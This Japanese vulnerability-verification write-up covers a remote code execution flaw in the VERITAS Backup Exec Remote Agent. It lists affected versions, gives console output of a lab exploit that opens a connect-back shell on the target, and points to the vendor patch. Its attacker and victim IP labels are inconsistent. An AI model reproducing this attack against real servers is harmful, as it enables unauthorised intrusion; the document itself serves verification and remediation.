目次
VX05-002:VERITAS Backup Exec Remote Agent の認証要求の確認機能に脆弱性
更新履歴
- 2007/02/01 初版
- Author grin
概要
- VERITAS Backup Exec Remote Agent に対するExploit
- このExploitを使用すると、任意のコードを実行可能
- 今回の検証では攻撃元IPアドレスにコネクトバックさせる
影響を受けるシステム
- Backup Exec 10.0 for Windows Servers rev. 5484
- Backup Exec 9.1 for Windows Servers rev. 4691
- Backup Exec 9.0 for Windows Servers rev. 4454
- Backup Exec 9.0 for Windows Servers rev. 4367
- Backup Exec 9.1.307 for NetWare Servers
- Backup Exec 9.1.306 for NetWare Servers
- Backup Exec 9.1.1154 for NetWare Servers
- Backup Exec 9.1.1152.4 for NetWare Servers
- Backup Exec 9.1.1152 for NetWare Servers
- Backup Exec 9.1.1151.1 for NetWare Servers
- Backup Exec 9.1.1127.1 for NetWare Servers
- Backup Exec 9.1.1067.3 for NetWare Servers
- Backup Exec 9.1.1067.2 for NetWare Servers
- Backup Exec 9.0.4202 for NetWare Servers
- Backup Exec 9.0.4174 for NetWare Servers
- Backup Exec 9.0.4172 for NetWare Servers
- Backup Exec 9.0.4170 for NetWare Servers
- Backup Exec 9.0.4019 for NetWare Servers
参考URL
Exploitの検証
検証環境
- Windows Server 2003 + VERITAS Backup Exec 10.0
検証結果
- 攻撃先IPアドレス: 192.168.0.10
- 攻撃元IPアドレス: 192.168.0.12(マシン名:VICTIM-W2K3)
- 攻撃元からExploitコードを実行
[*] Starting Bind Handler. [*] Attempting to exploit Veritas BE 9.0/9.1/10.0 (All Windows) [*] Sending authentication request of 8744 bytes... [*] Got connection from 192.168.0.10:1090 <-> 192.168.0.12:4444 Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter ローカル エリア接続 : Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.0.12 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.254 C:\WINDOWS\system32>hostname hostname victim-w2k3 C:\WINDOWS\system32>
対処方法
- 修正プログラムの適用 (http://seer.support.veritas.com/docs/277429.htm)
